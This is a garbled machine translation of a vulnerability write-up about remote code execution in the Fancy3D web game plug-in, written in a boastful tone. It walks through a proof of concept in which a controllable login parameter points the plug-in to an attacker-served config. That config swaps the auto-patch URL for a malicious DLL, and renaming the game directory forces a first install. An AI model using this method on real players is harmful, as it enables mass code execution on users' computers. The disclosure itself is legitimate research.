How to win hundreds of thousands of Top-page players' computers (Fancy3D Game Engine Remote Code Execution Vulnerability)

How to win hundreds of thousands of Top-page players' computers (Fancy3D Game Engine Remote Code Execution Vulnerability)

The title must be sexy, the vulnerability type must be held, and the self-evaluation rank must be high so that there will be lightning.

Over the past few years, web games have become increasingly popular, with the trend of replacing client games. From the early text games to the later js, flash, and 3D games, the game engine became increasingly mature and the method of making money became more and more intelligent. Behind the splendor, security issues are rarely mentioned.
Today, we are dropping a blockbuster. (Yes, I am anonymous. Did you find me)
Are you playing XXX? Play? Oh, you're my zombie.
Do you play XX? Don't play? Have you ever played XXX? I played for 1 minute six months ago? Oh, you are my zombie.
Do you play XX? Don't play? Does XXX play? Are you a developer? Oh, you're still a zombie.

The following is a very serious description. Oh, sorry, it takes three months for you to see me.

Fancy3D, a 3D Web Game Engine independently developed by Beijing qingguo smart Technology Co., Ltd. In the test, it is found that some parameters can be controlled at will to implement remote command execution. The analysis process is as follows:

Let's take a look at the game loading page. Here we chose a Suzhou zhengdu Technology Co., Ltd. to develop the Three Kingdoms Wushen game.

To keep the volume clean and tidy, the code is deleted

Game home: http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login? Platform = xxxxxx

<Script src = "http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18"> </script> // load post-configuration <script src = "http://res.ly.sgws.g.1360.com/static/52xiyou/js/logic1.2.js"> </script> // Fancy3D plug-in launch script this. logincode = (function () {var box = 'no'; if (_ self. platform = 'X') {try {window. external. getClientInfo (); box = 'X';} catch (e) {box = 'no';} return 'foaparam = lordcrab: \ // sn = 18 servers \ x26sa = s18.37wan.sgws.ate.cn: 3018 \ x26tl = 1439716841 \ x26un = p37_18_xutianle2 \ x26cc = a certain md5 \ x26nc = signature \ x26dx = \ x26ndx = \ x26cv = test3 \/\ x26api = http: \ // s18.37wan.sgws.ate.cn \/proxy \/getv \/x52 \/18 \ x26xcn = test \ x26xcv = 3 & xdt = '+ box +' # http: \ // s18.37wan.sgws.ate.cn \/proxy \/getv \/x52 \/18 a 3 test 1';} (); // logincode generation will be discussed below

First look at the http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18

window.gameversion="1400301";window.TangRen_AutoPatch="http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip";window.fancydownurlx64="http://res.ly.sgws.g.1360.com/static/fancy/down64.dll";window.fancyentryurl="http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe";window.clientversion="1.0";window.versions="1400229";window.fancydownurlx86="http://res.ly.sgws.g.1360.com/static/fancy/down.dll";window.entrymd5="8cbed3568c343907430a7a4c5b1ac428";window.mfc="http://res.ly.sgws.g.1360.com/updateot/mfc.zip";window.TangRenPluginSetUp="http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip";window.fancymd5x64="dd6ffd1aedc204efec3a722ec670f176";window.fancymd5x86="aa401a6cb0f487078b75454576eba479";window.version="1.0";

Some initialization configurations are defined here for convenience. The configuration below is called "configuration 1"

Then let's take a look at the part of logic1.2.js that starts the plug-in.

... The above is omitted... // ----------------------------------------------------- // start the function load_fancy_html_obj () {var attr = _ E. browser = 'ie '? 'Classid = "clsid: b2e8d85e-c0c5-48df-8dbc-1359b339ae32" ': 'Type = "application/fancy-npruntime-fancy3d-plugin"'; var liburl = window. fancydownurlx86; var libmd5 = window. fancymd5x86; if (_ E. browser = 'ie' & _ E. platform = 'x64 ') {liburl = window. fancydownurlx64; libmd5 = window. fancymd5x64;} var tr_pick_url = 'HTTP: // '+ _ G. pickurl + '/pick/multiinfo', tr_createTokenUrl = 'HTTP: //' + _ G. apiHost + '/createtoken? Token = '+ _ G. tr_token, tr_createTokenKey = 'none', tr_createTokenName = 'none'; var param1 = _ G. username + ''+ tr_pick_url +'' + tr_createTokenUrl + ''+ tr_createTokenKey +'' + tr_createTokenName + ''+ _ G. logincode; var html =''+''+''+''+''+''+''+''+''+''+''+''; $ ("# Fancy3d_divbox" ).html (html) ;}...... the following content is omitted ....

Important variables (meaning if this variable is faulty, the plug-in will not start or cannot be executed)

Attr selects the plug-in Loading Method Based on the browser

After the liburl plug-in is started, the files downloaded first come from window. fancydownurlx86 of configuration 1.

Libmd5 as the name implies, the MD5 of the above file comes from window. fancymd5x86 of configuration 1.

Exeurl the address of the game main program comes from configuring window. fancyentryurl

Exemd5 the main game program md5 comes from window. entrymd5 in configuration 1.

Param1 common parameters are passed here. The more important thing is that the _ G. logincode source is above

The following describes the observed process:

1. After opening the webpage, first load the fancy3d plug-in

2. After the plug-in is started, create the directory ZDSGGame under C: \ Users \ User \ fancy \

3. The plug-in downloads liburl (down. dll) and Loads

4、plug-in downloads the game main program sangowebentry.exe and starts

52.16sangowebentry.exe request the api in logincode to obtain the version number

The contents of the 62.16sangowebentry.exe request http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18 (source logincode) are as follows:

{"gameversion": "1400301", "TangRen_AutoPatch": "http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip", "fancydownurlx64": "http://res.ly.sgws.g.1360.com/static/fancy/down64.dll", "fancyentryurl": "http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe", "clientversion": "1.0", "versions": "1400229", "fancydownurlx86": "http://res.ly.sgws.g.1360.com/static/fancy/down.dll", "entrymd5": "8cbed3568c343907430a7a4c5b1ac428", "mfc": "http://res.ly.sgws.g.1360.com/updateot/mfc.zip", "TangRenPluginSetUp": "http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip", "fancymd5x64": "dd6ffd1aedc204efec3a722ec670f176", "fancymd5x86": "aa401a6cb0f487078b75454576eba479", "version": "1.0"}

72.16sangowebentry.exe extracts the TangRen_AutoPatch address from the request result in the previous step and downloads and decompress it to the client directory.

8w.sangowebentry.exestart automatic update from clientdirectory uncompress tangren-autopatch5.18.zip and load TangRen-AutoPatch.dll

9. automatically update and enter the game

From the above process, we can see that if the content of step 3, 4, and 6 can be controlled at will, you can download and execute any exe or dll.

The actual test showed that the parameters 3 (liburl) 4 (exeurl) do not run as long as the domain name plug-in is changed. The check should be performed.

Step 2 from http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18

Http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18?logincode

Logincode is controllable and the plug-in can be correctly read and loaded according to the format modification. Therefore, the test environment is set up as follows:

First write a TangRen-AutoPatch.dll

Poc.

Package tangren-autopatch5.18.zip to the web directory.

Create a PHP File

If ($ _ GET ['type'] = 'gameversion') {// The api diagram requested in step 1 of the process is also changed to die ('123') here ');} else {echo '{"gameversion": "1400303", "TangRen_AutoPatch": "http: // localhost/updateot/TangRen-AutoPatch5.18.zip", "fancydownurlx64": "http: // localhost/static/fancy/down64.dll "," fancyentryurl ":" http: // localhost/static/fancy/SangoWebEntry.exe "," clientversion ":" 1.1 ", "versions": "1400303", "fancydownurlx86": "http: // localhost/static/fancy/down. dll "," entrymd5 ":" 9cbed3568c343907430a7a4c5b1ac428 "," mfc ":" http: // localhost/updateot/mfc.zip "," TangRenPluginSetUp ":" http: // localhost/TangRenPluginSetUp1.4.zip "," fancymd5x64 ":" ghost "," fancymd5x86 ":" ghost "," version ":" 1.0 "}';}

The most important part is

"TangRen_AutoPatch": "http://localhost/TangRen-AutoPatch5.18.zip"

Then, modify the browser on the game homepage, and nothing happens...

Check the plug-in log and find that TangRen_AutoPatch will only be downloaded and executed when the game is installed for the first time (or version update? I haven't studied it here)

We need to load the game for the first time. Let's take a look at the first loading process of the game. Step 2

2. After the plug-in is started, create the directory ZDSGGame under C: \ Users \ User \ fancy \

Is this ZDSGGame very familiar? When the game loads the plug-in, there is a value for the game parameter.

var html = ''+''+

With a try, I changed ZDSGGame to ZDSGGame1 and opened it in the browser again. after about five seconds of refreshing, I found a familiar calculator.

Check C: \ Users \ User \ fancy \ and the ZDSGGame1 directory is generated.

Postscript:

Many popular games on the market, including dark light Buddha Ben Dao and so on, are using this plug-in. Although the specific process is slightly different, they are sharing the same Web plug-in.

Classid: b2e8d85e-c0c5-48df-8dbc-1359b339ae32

So if you have played any game with this plug-in, you can be attacked. Of course, this includes the developer who installed this plug-in. The title is not exaggerated.

Because the plug-ins are cross-browser, you can test firefox ie 360 in high-speed mode (compatible mode) to successfully run the plug-in.

Solution:

Check for a full set of details.